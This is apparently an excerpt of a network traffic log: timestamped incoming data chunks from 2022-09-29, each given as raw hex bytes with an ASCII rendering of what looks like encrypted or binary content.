                                                                                                                                                            2022-09-29 12:45:15 UTC18405INData Raw: 17 7a 6a 45 f2 e7 42 b2 92 42 6b ba 0d c6 f6 47 a2 28 25 04 34 ea d4 bd d2 02 20 ee a3 0d 46 8b 76 ba 75 30 85 bf 76 29 bb ec 73 72 4b b2 31 e3 af e8 aa 31 e6 08 a2 df ab 57 0c 1a 2b 7b 3c 5a ac 23 42 30 7c ff 94 7d f2 e9 e1 48 eb 2a bf ce 7e e8 3d eb 2d e9 a7 eb 0e 03 26 58 3e 81 20 9d da 76 6e fa 81 98 ee ea 84 44 43 fb 95 78 b7 ed 67 2a d6 9d 19 25 e0 3b 64 09 18 4a 8d bc 8c 63 56 79 b1 42 02 ca bc 4c a6 c4 40 fa cc 8d 15 69 65 ff db c0 0b 6e 9c f8 5b 12 51 4f 11 30 ac a5 ef 9e 03 24 79 4d f6 58 ed e1 b8 c5 55 e2 47 c0 e3 53 be 5c f5 26 c3 34 29 99 9d 38 57 9e 37 84 0c 5a 90 ec 76 50 77 50 ab f9 a0 f8 be ce 22 93 50 5d 18 b0 53 c4 8f 78 45 2a c6 a2 7e 9a 67 fc 1d 9c ba 9a 1b 1f 4a 29 60 f6 15 0f 3f ea 1e 53 ed 31 eb ef 8e 9b cf 0d ed 87 8d f2 d8 3e 7c
                                                                                                                                                            Data Ascii: zjEBBkG(%4 Fvu0v)srK11W+{<Z#B0|}H*~=-&X> vnDCxg*%;dJcVyBL@ien[QO0$yMXUGS\&4)8W7ZvPwP"P]SxE*~gJ)`?S1>|
                                                                                                                                                            2022-09-29 12:45:15 UTC18421INData Raw: 0a 7c 0a 07 cd 44 07 64 86 41 82 fa ae f3 2b 41 be 3c a5 e1 43 78 32 2b ef ae 5a 2b 09 e6 7b 0c 65 76 7e d4 ca 4f 05 d6 26 68 c3 b9 55 94 ed d5 41 aa 4d 0a bd 1d f4 fd b5 e9 b0 7b 0b ea 69 43 83 80 85 14 83 32 5b b8 bb 52 71 60 be 74 ed 85 7b 9e 0f 52 cc c4 07 d5 02 ca bc 01 9a d9 1a 61 67 a0 97 92 21 3a 4c ed 4e 52 9f a0 a0 42 8b d7 bf cb cd ea 82 58 87 d1 7c 94 55 7c 5b 5d a1 bb f4 85 55 e9 1d d0 4a 86 8b f7 94 69 80 1c 66 d5 f1 c8 08 d7 a9 37 8d ab c6 02 42 b1 3b 4b 3d 0a 14 72 50 64 18 1f 03 1c 45 d7 fc e1 81 82 8b 76 33 16 c6 a4 a4 16 aa c5 3f 12 b6 9f dd 4a e3 de 6b cc a1 15 2b 16 03 44 92 9a a7 8a 1a 7e ee 45 e2 9d b1 da 21 78 50 94 ee cf a3 df f6 8d c3 11 0d ae db dc 91 15 d0 2a d5 01 27 78 d6 ce ff 23 04 26 ae 17 11 3e c5 2b 42 1c d8 c2 e9 70 7a
                                                                                                                                                            Data Ascii: |DdA+A<Cx2+Z+{ev~O&hUAM{iC2[Rq`t{Rag!:LNRBX|U|[]UJif7B;K=rPdEv3?Jk+D~E!xP*'x#&>+Bpz
                                                                                                                                                            2022-09-29 12:45:15 UTC18437INData Raw: 18 4d 93 45 6b 8c c3 45 6e 94 18 7c ba f0 53 dc ba a6 32 83 1e da 4d 73 c7 c5 f9 82 8f b2 86 45 66 36 19 b8 c5 ff 47 da 74 24 0b 2e 5e 3e c0 6b 73 a3 b2 3f 82 cf ba c2 70 11 80 2a da 45 a5 4d 48 ec 54 ab 55 5e 29 98 8b 06 39 12 5e 73 eb b0 c0 7f 34 80 62 3e 33 73 a0 38 02 96 71 1d 4b ad d2 d4 fa db fd f7 c8 ab 1c 8b 1c 8c 07 55 3c bc 62 6b ee a6 fb 94 64 23 9a c7 5f 11 60 39 29 f7 76 c6 58 5d bc 75 f6 47 98 42 73 d0 8e 25 d3 9a da 86 d6 73 2e fb f7 45 7a f1 eb 4e 85 e4 b5 49 68 1b 83 82 00 24 e1 e2 92 e4 2e 70 9c 3d e8 6c 08 f6 0a ee 15 cf f2 a3 bc 63 5d 15 44 b0 42 62 1b d0 e3 48 17 1f 04 45 9b 7e 53 7f ad 43 91 13 66 da 23 41 b6 78 7d cb 8f 69 93 b9 9f 98 c8 ed e6 b1 64 e8 25 d4 a6 61 63 ee ec 88 89 22 da 55 c6 f3 02 00 ac 11 9b df 2e a9 56 b0 c3 90 06
                                                                                                                                                            Data Ascii: MEkEn|S2MsEf6Gt$.^>ks?p*EMHTU^)9^s4b>3s8qKU<bkd#_`9)vX]uGBs%s.EzNIh$.p=lc]DBbHE~SCf#Ax}id%ac"U.V
                                                                                                                                                            2022-09-29 12:45:15 UTC18453INData Raw: a1 ea 8c 17 a7 6b cd 93 c6 e2 17 6c a9 e8 11 d7 91 54 fd c9 1f 2b 4b 89 e9 f5 bd 5a 17 1a 46 b4 50 31 53 b5 f6 98 12 b4 cb 9f f9 76 1c db 56 4d 02 09 93 f4 a7 d2 5d bc dd ef e2 d0 2a 0f 26 94 d6 63 b2 a4 d5 10 a5 ea b0 f5 f0 39 52 9b 89 7d ae 3e 86 2d e6 b9 71 67 65 b0 1e 0c 5e d7 ba 0e d9 8a 9b 59 ba 4e b9 f2 0a 45 c3 af 56 00 4f 94 06 b3 68 dc 72 31 9e 61 64 4f fd 9e e7 73 bd 10 b3 59 4f bf 1a c2 04 97 04 8d de 2f a7 50 19 60 a9 3c c5 92 29 7d 4b 00 9c 0f f9 92 e2 d7 b3 72 01 10 cf 88 3c b2 18 db 35 d5 5d 36 d0 5e 74 ad 61 37 81 e0 ef 46 ad a8 3a 90 ff 9b 4e 15 8a 8f 68 0b f1 15 60 93 fb 24 ed a9 2a c5 d6 aa b6 0d 46 15 72 11 58 20 b3 a1 14 6d 0b 72 36 1d 1f 55 48 ba db d0 dd ac 8c 50 ce 98 ad 31 db 2e c6 e5 0c 58 4a 37 5f 5c 69 b3 29 34 4f 21 b9 fd 65
                                                                                                                                                            Data Ascii: klT+KZFP1SvVM]*&c9R}>-qge^YNEVOhr1adOsYO/P`<)}Kr<5]6^ta7F:Nh`$*FrX mr6UHP1.XJ7_\i)4O!e
                                                                                                                                                            2022-09-29 12:45:15 UTC18469INData Raw: 39 b5 a3 d5 cb 8a 00 05 b5 d5 1c da e5 99 03 b3 7f 0e f5 8b c8 c2 70 0d a4 54 bd 7c 76 9f f1 ab d6 cc a2 be f7 dc 68 24 1f 0f 25 5c 76 a8 4c 51 82 ba a9 a9 d3 6f ae 67 fe 54 e2 88 a1 6b 28 a1 34 c6 33 15 d8 32 8f c8 b9 c8 52 6e e2 2a 10 04 27 cc fa a2 60 51 8a 60 06 08 98 19 f4 5b de 96 ae ed e3 a4 53 77 9e 9b e9 cc ec 80 f8 fd af 41 b4 33 80 42 50 72 ea 31 a2 d3 59 50 71 03 ed 70 1a 53 60 db a7 87 0d d1 e0 07 43 a2 0f 2b 70 d8 50 b9 50 d4 1f b3 5f 2d a4 ad dc ed ab ba 2d f1 a3 16 3c 3f 47 6d 00 6c 2d f3 c5 51 5e 48 a8 09 60 58 9e 20 4a 8c 15 f5 00 77 1c 1b 3f d7 b7 99 71 05 4a 0f a3 80 75 af d9 83 1f b7 c2 a1 04 82 cb 19 e5 ea 4c a1 fc 42 4d ba e8 f6 6e fe b0 9c f0 e6 4e e6 f2 f5 0b 12 16 b1 ec 4b 95 17 b4 0b 78 46 1d 4c 4d c0 cb 68 0c 65 a8 da 59 d4 17
                                                                                                                                                            Data Ascii: 9pT|vh$%\vLQogTk(432Rn*'`Q`[SwA3BPr1YPqpS`C+pPP_--<?Gml-Q^H`X Jw?qJuLBMnNKxFLMheY
                                                                                                                                                            2022-09-29 12:45:15 UTC18485INData Raw: 28 fa 0b a1 f3 bc 4b 01 7c 0b 01 c1 6e d7 cf a9 5c bd 3e e3 f8 4b ed b6 bf 3f 15 13 47 a3 f9 13 d1 bd 8f 38 f5 bb 06 2a e1 de 27 7b 4e ba e7 7b 9a 97 05 8d 94 4a 85 76 df 26 86 00 28 23 ea d8 50 c2 ce a0 ea 50 03 f1 0f 40 f0 0a a3 8d 92 cb a5 e4 ea db 5c fb ee 11 2f 63 28 8c 9f f9 1a 9f 54 1d c7 bc b5 24 af 1b dc 43 67 7b 32 52 b8 28 de 9f c0 d3 1b d9 58 b4 bc 98 59 53 fc 7d b9 5a 1d 4e 9b 81 0b 24 c3 ae 05 56 5d 0c 18 0c 04 42 a7 db 7a 9e d2 dc 79 30 b5 ac 4c 54 ea 57 50 3a 3c 22 9f fa d1 b8 9f 07 a0 d0 dd d9 e9 70 71 a1 3d 21 b7 b2 fa 4b a6 b3 de 9b 8d 93 37 1c 48 be 61 97 56 65 23 5a 2f b7 93 39 12 57 13 66 d3 60 50 57 d9 83 86 33 20 f6 83 60 85 29 d2 1c 1b b0 e3 09 19 47 40 38 12 92 51 4e 7a bf e1 e4 e6 81 bf 81 a7 4d 30 18 76 a8 5a 3f 14 f2 fd c2 b7
                                                                                                                                                            Data Ascii: (K|n\>K?G8*'{N{Jv&(#PP@\/c(T$Cg{2R(XYS}ZN$V]Bzy0LTWP:<"pq=!K7HaVe#Z/9Wf`PW3 `)G@8QNzM0vZ?
                                                                                                                                                            2022-09-29 12:45:15 UTC18501INData Raw: ba 23 7f e8 9d 66 cf 99 99 74 cc f0 64 b7 54 b7 43 04 95 18 04 65 9e ee 83 da 40 e3 47 ef 9f c0 83 a1 27 80 ed 17 24 f1 08 3e c2 87 18 99 81 9c 1c af fc 55 9f c1 fb 40 e6 6b 95 d6 62 c5 4b 20 13 a2 eb 1e 2e f8 44 1a 5c b1 6e 76 09 90 d7 b8 01 b7 17 f2 e3 65 e2 d4 fc ea f9 35 b9 fc 00 c2 ae dc f3 8b b2 56 6c 50 bc 3c 22 bf 98 39 4e e8 5b 88 05 ac 9b 7a d1 ca 22 31 e5 5b e6 0a fa 0a 7a b7 8f 6e 96 7c 54 0d 08 9e 37 31 47 49 07 70 e8 02 0b 00 18 90 24 ce e7 1a 6a 91 c3 00 66 57 ae a7 61 e4 d7 ae 14 9e d4 c7 8e 1e 97 81 77 94 82 53 f8 44 b1 56 78 76 f8 bb f9 4d 52 92 7d e1 cc 71 75 f3 57 76 bf b2 1b db b0 90 53 bb 0e a8 36 16 b4 22 2b f0 9f 9a 11 40 05 fe a1 00 d0 d6 e1 99 cb 59 5c 0d 96 a7 c4 71 6e e8 74 e9 6c 41 53 f7 c0 63 ec b2 c9 ef db 14 89 74 f3 f9 d9
                                                                                                                                                            Data Ascii: #ftdTCe@G'$>U@kbK .D\nve5VlP<"9N[z"1[zn|T71GIp$jfWawSDVxvMR}quWvS6"+@Y\qntlASct
                                                                                                                                                            2022-09-29 12:45:15 UTC18517INData Raw: ce 5f 48 58 3f b1 67 f8 4d de 49 74 7d 18 28 dc be 47 38 bb 09 fc 7f 26 34 fc cc 26 da 3c 1f a3 65 2c 16 83 87 53 c0 74 4b 4a fd 52 1a ce 93 99 b6 34 52 48 76 5c d4 20 ce 80 c3 6d 33 8e 98 22 4e e4 84 7a 74 22 6f 90 c3 75 82 36 98 83 3b 5f fa c5 ef 04 0d e7 bd 0c 04 99 e2 58 f8 48 c4 b5 ac ef 71 e7 32 47 92 b2 b1 03 53 a8 34 67 78 87 d0 03 ba 1a 47 20 ad 6c 26 0c d8 c0 0e d4 a1 e1 e1 69 c0 45 eb fc fb 14 7e 28 46 22 14 a4 0c 4b d5 3f d1 20 32 ef 9c de a0 fb 32 02 8d 03 66 96 f0 98 7b 67 7c 53 36 c8 e9 39 04 26 c5 b0 dc 98 80 39 e6 c1 36 88 b7 a9 0c e3 fe 5a 95 86 52 f9 93 3b 44 49 47 dd b7 fa 58 b0 0a 39 08 c0 34 59 30 d0 fe f2 de d9 8f 3b 32 60 0f a7 ab c9 c8 d7 db dc 13 10 7d e2 ea 9c a4 35 b4 e0 1c ea 42 fa 08 82 dd ce 11 b6 c8 6d 3c 3d 0d 9a 3f 06 15
                                                                                                                                                            Data Ascii: _HX?gMIt}(G8&4&<e,StKJR4RHv\ m3"Nzt"ou6;_XHq2GS4gxG l&iE~(F"K? 22f{g|S69&96ZR;DIGX94Y0;2`}5Bm<=?
                                                                                                                                                            2022-09-29 12:45:15 UTC18533INData Raw: 63 ee f3 c0 5b 04 a5 31 2d bb d8 a5 55 e1 75 6c d9 ea 8e 26 14 55 fd 8e be 32 63 40 b3 ce c0 7d 27 9b 5d b4 25 86 40 d4 82 66 48 85 21 53 b7 d3 3e 68 77 f0 2d e0 93 45 a9 1f ff b3 f7 d3 05 ed cd 4c 65 63 5a e7 f2 5e 9b fe be e2 fd 3e ed ba 89 3b 6a 29 db 18 ac 41 e6 90 4e 63 ec 04 29 de e5 03 e6 73 dd 08 f3 d2 ac c2 06 84 82 e7 9f e1 3a e4 aa 3d 75 6e bf 38 2a f8 f5 ee 49 e7 de d7 20 b7 b6 5a 84 4c d7 c3 ba 28 f0 d1 b6 5b bd e9 66 32 35 a1 18 e8 ca 1e f4 dc cb 88 9d 5e 12 4d e2 30 1d 0f 48 9c 9a 36 37 ad a6 a2 e0 14 c4 6c 32 56 a6 a9 88 df eb 57 9e db 29 00 8c ae 51 41 45 9c 7a 42 bb 11 c5 27 bf aa 8c ae ad 3b 45 6b ff 6c 00 12 e9 b5 b5 0e 54 69 00 18 73 f8 b4 ac e2 ef 9e 8f ce 9e 75 fb 12 d4 4f 8e 46 63 f5 d4 6b 3a 8a 4e de 3f 26 c3 9f e4 ae 0f 06 45 9f
                                                                                                                                                            Data Ascii: c[1-Uul&U2c@}']%@fH!S>hw-ELecZ^>;j)ANc)s:=un8*I ZL([f25^M0H67l2VW)QAEzB';EklTisuOFck:N?&E
                                                                                                                                                            2022-09-29 12:45:15 UTC18549INData Raw: 33 55 70 80 9a 1d 39 71 d2 52 1f be 8d 6a 90 f5 e7 5a 01 f3 1b 8a 4c fb fb 71 ff bc f7 64 58 98 26 97 b5 08 b8 10 65 1d f1 eb b1 78 24 84 2f 39 4d d6 ab 6b 93 2a 22 4d 84 56 7f 13 01 53 21 0f 01 d1 3e 58 16 52 04 d3 91 87 c4 66 18 77 34 4a 8a 79 a9 84 88 fc 16 cf 7b 2a 57 df d1 90 69 5b 30 84 e6 73 2a dd 98 b1 37 05 ef e1 d8 92 15 26 d2 e7 00 d1 32 08 9a cf 64 e7 0c b1 ed 76 50 ba 86 d3 8a 39 1a e8 47 6d 7a 94 b5 f5 bc 06 74 3d eb af 38 54 ab 90 2a 46 5b 0e 5a ae 35 d9 99 c4 b7 a2 a4 3b 5d 6b 52 39 69 a2 b7 79 ac cf fe 79 c1 7d 62 1f e0 07 1f 9f fe b3 92 86 8b 54 71 89 a6 f9 45 d4 34 3d 36 87 b2 a6 a3 62 e9 20 76 1e 9a 77 61 5a f9 44 16 c1 aa 71 93 00 fd e8 f3 87 57 56 f2 a1 aa 69 37 69 0e b3 8d 96 59 90 7e 8c 4d 3a c7 5a 3f f6 e7 67 1d a9 55 54 b1 6a d8
                                                                                                                                                            Data Ascii: 3Up9qRjZLqdX&ex$/9Mk*"MVS!>XRfw4Jy{*Wi[0s*7&2dvP9Gmzt=8T*F[Z5;]kR9iyy}bTqE4=6b vwaZDqWVi7iY~M:Z?gUTj
                                                                                                                                                            2022-09-29 12:45:15 UTC18565INData Raw: 83 68 a3 84 5e 9f ae 0b f5 5e 03 7a d1 88 5d 63 73 ee 91 20 0b f7 77 5d a8 b7 32 8b ba 86 83 ae 8a 4b f9 47 33 33 71 0b c9 85 aa 0c 86 62 f7 11 d9 8a 5a 13 73 41 09 42 2c a1 53 be b1 2d 16 b4 16 2b cc d2 92 b7 e0 e5 9c e8 7d 9b 58 b1 e6 2d 31 af e9 47 64 d9 86 ea 7b 07 47 0c b1 b3 21 6f 4f cb a9 d4 88 e3 29 b5 d1 08 e8 b4 80 2e 9b 1b 89 62 5c e1 5a 85 3e 72 81 f2 33 76 c4 da 91 e8 1a 76 f5 2b b1 e5 62 2a 95 42 db c2 b9 6f 81 8c 3c b1 c5 fb d6 91 86 e8 54 4c 32 8c 44 f1 23 c1 b0 7a b3 7d 7b 8e 08 67 1d 68 95 0c b5 0c 61 f6 4f ab 93 38 10 61 04 a3 ff b7 67 18 c7 b9 90 de d4 ec a1 5d 34 16 cc 86 28 d1 46 68 89 8e 9f 35 84 03 2b 10 b7 53 8d 00 4c fb 05 7c 19 95 a4 18 d4 7f ad b7 84 9a bd c5 e4 83 42 81 88 1f f7 bb 87 0f 95 f5 82 ee a0 20 9e 18 10 20 c2 c7 42
                                                                                                                                                            Data Ascii: h^^z]cs w]2KG33qbZsAB,S-+}X-1Gd{G!oO).b\Z>r3vv+b*Bo<TL2D#z}{ghaO8ag]4(Fh5+SL|B B
                                                                                                                                                            2022-09-29 12:45:15 UTC18581INData Raw: 83 59 d9 f0 a1 24 5b 8d 9c f5 3a 72 22 3a d2 ce 83 d5 02 9a 8c e4 ee b3 ca ee 15 32 dc 27 b3 66 bc c8 a1 1c 90 26 a6 0e 5c 26 63 16 5b 55 26 e6 fe 9f bd 06 83 45 31 9a 7d 31 81 c6 74 ee 9d 23 07 fb 63 14 60 10 1c e5 00 ac d4 d5 30 5d 44 b2 63 05 52 e5 ff df f5 77 89 d6 0c 1e 5d 97 07 cd 5d 30 3f 93 53 62 d6 b5 dd 23 ff d2 65 13 c5 72 5d 78 66 ba 18 fe 96 26 9d 79 2c d0 93 ac cc 48 23 ad 0f a6 8c 1b 48 2f bc dc a0 94 44 32 df f0 05 e3 79 eb 6b 42 dd 1e 37 3f 69 10 d8 af cb b7 22 65 d6 d0 53 4e 06 c1 e8 f6 43 2f 1e 51 1f b9 73 21 dc 3d 10 df 1b a1 b3 38 c4 97 85 60 3b 97 8f 48 66 95 51 38 e8 36 55 21 bd c3 4b c3 eb 7b a6 5c 5d 9c e5 54 7b f8 77 53 7b e5 f2 80 6e 33 cd 63 cf 82 f9 b3 cb 10 7e 14 aa ab 7f 70 7a 7e de 39 b3 40 31 e9 ff 35 07 ef 9e 8e 5c 37 bf
                                                                                                                                                            Data Ascii: Y$[:r":2'f&\&c[U&E1}1t#c`0]DcRw]]0?Sb#er]xf&y,H#H/D2ykB7?i"eSNC/Qs!=8`;HfQ86U!K{\]T{wS{n3c~pz~9@15\7
                                                                                                                                                            2022-09-29 12:45:15 UTC18597INData Raw: 2d e9 2e e9 87 24 b5 c2 45 00 21 04 93 92 11 c9 d7 7c 4f 4f bd 6e 55 b1 ba b7 2a ee 92 11 e5 94 15 60 83 4b f9 1e 9a 27 18 10 43 4b 8d ad bd 29 d6 7f 7a db e1 a5 eb 25 36 0d 66 93 f8 11 44 8a 42 c3 94 73 eb df 39 3b 99 02 a3 68 82 35 d5 46 17 6d 4a 5d bb 03 81 58 22 4d 51 bd 88 e0 8f ba 8c 8d 53 c2 25 b7 83 93 7f 57 e6 10 9c d3 26 dd 39 07 52 9a c1 52 49 b3 1c 6f 4a bb 3a 54 89 5d 29 8e 33 27 c3 e9 9b 18 aa 37 88 da f4 c8 86 f1 74 97 2a d6 cb 26 a6 f4 fd eb 4d 13 8f ff dc f5 cc 37 87 00 3b f0 44 59 c4 44 b6 82 0d bd c3 ad 05 a8 de d3 93 b6 12 68 c7 cd a1 60 b1 14 9f 3c ca ee 7e 40 3a 48 b3 28 40 c1 99 e7 59 f2 c3 65 d5 61 da 1f f1 95 72 bf c0 cb 7c 30 3e 60 bf 05 89 70 57 84 c4 b9 60 6e 71 07 16 77 8c 4c 45 e4 3a ed 21 20 31 2e 74 4c 4c df d7 5e 19 44 62
                                                                                                                                                            Data Ascii: -.$E!|OOnU*`K'CK)z%6fDBs9;h5FmJ]X"MQS%W&9RRIoJ:T])3'7t*&M7;DYDh`<~@:H(@Year|0>`pW`nqwLE:! 1.tLL^Db
                                                                                                                                                            2022-09-29 12:45:15 UTC18613INData Raw: 03 4b 0e 2a 9c 3f 9d 04 2b 69 73 18 a0 b5 78 90 77 38 06 8f 8e ad cb c1 57 b1 0d 1a 6d a3 79 5e 1e 6c 90 bf 5c 2f b1 ca 3e e2 4a 29 5f 38 25 e3 c0 82 6d 04 12 4a 01 aa c5 0a 45 e8 16 b1 92 e2 9d 10 0f b3 1d bd ae e5 13 79 dd 52 71 18 85 da 80 05 27 51 30 e3 7b 12 79 a4 4f ab db e2 cd 52 9b 55 fa 3f 15 fb 12 3d 37 b2 b2 29 b4 d4 ed c5 89 07 a4 a6 7c 31 e5 70 9f 27 fe f0 3c d4 c7 0f ba fd 31 56 50 44 13 fd 55 eb 91 b4 65 98 e9 04 08 dd 1d ae 79 e6 94 ea 5f 8c 99 16 a3 fe af 0d 47 52 70 ed f7 4f ad 06 31 e9 26 85 8d 1c 8b e0 39 6f 0c 76 2b 37 1c 16 31 db 63 42 f8 1d d4 0e b7 2f 6c c4 13 96 ff 68 02 34 4d 57 fe 3c 11 45 d8 2e d7 ea ef 05 69 0f 6c 8f 8a 57 03 df fa b5 0e d0 37 9d 14 d6 60 40 5e 30 27 3a c4 cc 14 91 ff f7 d0 83 02 cd be cb 57 38 91 6b d8 f9 6e
                                                                                                                                                            Data Ascii: K*?+isxw8Wmy^l\/>J)_8%mJEyRq'Q0{yORU?=7)|1p'<1VPDUey_GRpO1&9ov+71cB/lh4MW<E.ilW7`@^0':W8kn
                                                                                                                                                            2022-09-29 12:45:15 UTC18629INData Raw: 7e e4 1b 75 ae 74 0a 3c 4f 72 8a b9 18 ed c5 90 ca da 8f 8d e8 82 32 30 f5 a1 42 72 d4 b7 03 bf 31 9c b8 cd 3a 25 a5 fd 83 5d 5b aa 57 ff d7 a0 d3 7d d4 ea 4d 1d 08 e5 a8 14 5f 81 67 04 c7 a0 74 55 1e bc b4 68 8f d2 1a 4a 3d 32 c0 fa c6 4f 83 85 ac a8 25 6d 85 b9 cf 45 e9 99 5e 7a 42 b3 e6 77 3a b3 1b 22 e2 29 e0 5a f3 8a e3 0a 4c 90 eb d6 a0 fa 68 27 e6 03 41 f9 84 f7 25 2c c1 94 2a fc 1f 91 f4 73 9e c8 c9 4a c0 8e c9 f2 40 3d 08 93 29 3f 31 31 c6 24 20 38 74 de 8d 62 8f 90 ef 11 4f 7d 53 b1 e2 f3 4a ab 32 3b cb 30 ff de 7b 09 0a 7d b5 87 e9 71 92 65 3b 89 b9 aa 04 20 7d 19 a9 43 47 e7 f2 e6 bb 17 f3 99 54 ae c5 58 cf bb 21 6d 48 28 27 16 9d 0e d6 28 13 e1 1d 42 24 64 92 ce 08 61 0a 73 5c 8a ff bc d1 d0 3a dd 66 93 e9 6a 58 1c 0c 9a 77 cc 39 cc d8 e1 a4
                                                                                                                                                            Data Ascii: ~ut<Or20Br1:%][W}M_gtUhJ=2O%mE^zBw:")ZLh'A%,*sJ@=)?11$ 8tbO}SJ2;0{}qe; }CGTX!mH('(B$das\:fjXw9
                                                                                                                                                            2022-09-29 12:45:15 UTC18645INData Raw: 82 04 53 3e f1 aa 9e d2 84 44 e9 53 4d 8d 72 c4 71 30 aa 85 39 36 4b 83 1d cd a4 46 0a 52 55 bc 7b fc f5 05 78 2b 70 47 35 3c bf 54 11 8c ef b3 e4 c9 d7 23 ac 6f d1 6d d4 41 05 38 f1 69 eb 7c 28 87 9f bb 2a b7 16 59 25 f2 dc 45 4b 14 5a 2d 6e 2a 64 19 0a e6 df a0 7b 36 44 52 16 98 0d ef c1 fa f5 72 67 3c 59 6e d7 51 dc fd e0 16 46 85 10 30 c3 b5 19 5a 59 41 23 1b 76 5d 5d 05 bf b2 a9 a4 0e d7 f9 0e cb ee 4b d0 c7 a2 de 01 6b 92 64 3c 3a 49 74 b3 eb c2 6d 87 9c cb 17 db 50 12 f0 23 e3 19 6f ea ad 31 6f eb 54 4c 40 ca c5 61 0b 4f 2e 9b 62 6d 84 8f a1 6c 1a a2 68 e4 43 44 d9 2d ce 1b f9 38 e1 fb 2c b7 d6 cd c3 84 ad e6 23 7c 92 eb 87 80 f6 f6 fc f7 26 c3 d1 12 22 e3 c4 81 b1 a2 76 a3 65 bc e9 83 16 65 7a 65 a2 ae 99 02 a2 30 76 f0 52 28 00 53 28 41 9e 3e 22
                                                                                                                                                            Data Ascii: S>DSMrq096KFRU{x+pG5<T#omA8i|(*Y%EKZ-n*d{6DRrg<YnQF0ZYA#v]]Kkd<:ItmP#o1oTL@aO.bmlhCD-8,#|&"veeze0vR(S(A>"
                                                                                                                                                            2022-09-29 12:45:15 UTC18661INData Raw: cd 3c af c2 c2 48 65 40 a4 e4 bf 68 96 ec 46 2b d5 18 47 b3 52 63 a9 35 9c fc d7 9b 6a 06 3b ba 97 55 f5 88 52 c3 27 87 74 b2 bf 09 f9 69 ab 3c ef 01 bb 03 a4 9f 47 73 a7 f5 04 34 35 a1 a0 08 a9 0e 79 81 6e 52 0f 5d 1e 21 43 f2 46 db ba cb c6 55 50 f8 b2 5b 50 62 3b 90 48 9d 25 59 ad 58 78 21 b0 ab ad cc e8 1d 00 14 e3 85 19 2e fe 5a 89 3c 76 0a 35 56 3b 13 3c 28 e7 6f 7c 5c b9 28 2c a7 d7 07 19 04 83 7b 35 d2 2a 33 ae 71 54 59 a5 19 b3 10 95 4b fe 7f 08 66 ab 27 ba 29 b3 6b 08 04 d6 f3 3c 6c 8e 6e f5 fd 5b 2d 5b c0 50 ed 66 ff 03 4a 6c c1 95 8d fb 1f cd 9a fe e0 c8 6d eb b7 3f 7e fe 13 c7 e3 fd 77 f9 c8 17 98 25 fd 52 18 a1 cc 36 f6 e6 fc 5b 26 47 60 f8 03 8f 86 ab 67 44 94 3f c3 4f 39 fe c3 c6 0d b2 84 4a 96 1e 6c 7f d4 64 1c 92 27 5f ec 48 f2 df 81 c0
                                                                                                                                                            Data Ascii: <He@hF+GRc5j;UR'ti<Gs45ynR]!CFUP[Pb;H%YXx!.Z<v5V;<(o|\(,{5*3qTYKf')k<ln[-[PfJlm?~w%R6[&G`gD?O9Jld'_H
                                                                                                                                                            2022-09-29 12:45:15 UTC18677INData Raw: b2 43 10 bb 2e d2 de bc f4 7b 06 e1 bc ee e8 dd dd 96 3f fa 99 60 e1 34 d4 74 d3 a8 f2 c0 1b df 59 a6 56 43 4b 7b 69 be 4c 7c c0 3f 61 ec 02 b8 4f e8 17 94 cb 7c 59 4f 53 fc 35 af ac 85 2d 9f b0 5e 23 cf d7 4f de a9 4e 70 65 fc bf a1 51 54 97 fc 85 8e a9 86 f7 03 9c 66 f4 9e 5c 84 db d0 a9 82 7c bd ca 7d 37 a2 8f 94 41 07 c3 9d f9 09 8c 14 44 1e c6 df 41 8e 8b 98 d2 90 06 ff 58 04 25 04 cc e4 eb 72 3b 10 62 49 72 51 b2 c3 f1 63 14 b5 e4 86 6b 08 e7 8a 86 4a 5d e1 6a a7 5b b7 55 5f d3 d7 92 77 fb 66 b3 98 7d 73 0d 24 f0 d3 60 b1 25 5e 6e a8 a4 ad 22 66 e0 83 45 cf 7b cb a8 48 ea 19 92 73 03 3e 01 d8 e9 94 e2 3f 4e 7a 8e 71 6c 91 2f 3e c1 ba 4d c6 90 2d 98 17 78 7f f4 99 fb ce 7e 4e 6b 3b bc c7 03 04 cc a6 bc c6 5e e8 70 7d 95 19 c6 b5 44 d0 95 b7 e9 8d 48
                                                                                                                                                            Data Ascii: C.{?`4tYVCK{iL|?aO|YOS5-^#ONpeQTf\|}7ADAX%r;bIrQckJ]j[U_wf}s$`%^n"fE{Hs>?Nzql/>M-x~Nk;^p}DH
                                                                                                                                                            2022-09-29 12:45:15 UTC18693INData Raw: 95 73 dd b0 b1 56 98 e1 4c 16 85 33 c0 fd ed a5 7d e7 e2 29 be 6b 7f ef e7 84 8b 63 85 ba 5b 21 7a d6 ef b6 49 47 1f e7 d0 c2 f2 c3 c7 83 da d2 01 84 a4 31 06 8e db b7 a0 4a dc bd 75 ce 77 15 2b 25 43 58 81 00 82 da d5 02 9b 36 0d 52 ed 8b 1b 37 ed 7d 55 04 f8 6e 4e 1e 3b 22 2c 0e ee 2d 4e f5 11 42 6f ec 94 3c f3 71 fc 9e 58 14 32 7b 75 25 e4 b1 3a 33 ab a4 70 98 e0 60 ba dd 9c 6c 51 61 18 f3 66 08 70 78 ec 49 40 19 1a 3d 25 2d d7 a3 c0 df c4 e2 a3 ce c8 cd 74 a3 97 85 ef c3 7d c8 10 14 5a cb 4a 19 00 38 f0 64 b9 90 b5 b0 5b 37 07 40 e4 b9 ed 88 0a b4 5d 9f 6c 4a 17 1a 40 30 ac c0 c3 ae aa 28 03 e1 c7 53 a6 92 07 af f1 c6 b9 99 5e bd f3 74 2d 1f 6f 48 6e f2 7c 95 79 8a 64 09 bf 2c bc 75 07 bb 9e 15 47 14 25 39 17 9b bd af 7d e1 cf 96 6e f6 2a 9d 11 73 02
                                                                                                                                                            Data Ascii: sVL3})kc[!zIG1Juw+%CX6R7}UnN;",-NBo<qX2{u%:3p`lQafpxI@=%-t}ZJ8d[7@]lJ@0(S^t-oHn|yd,uG%9}n*s
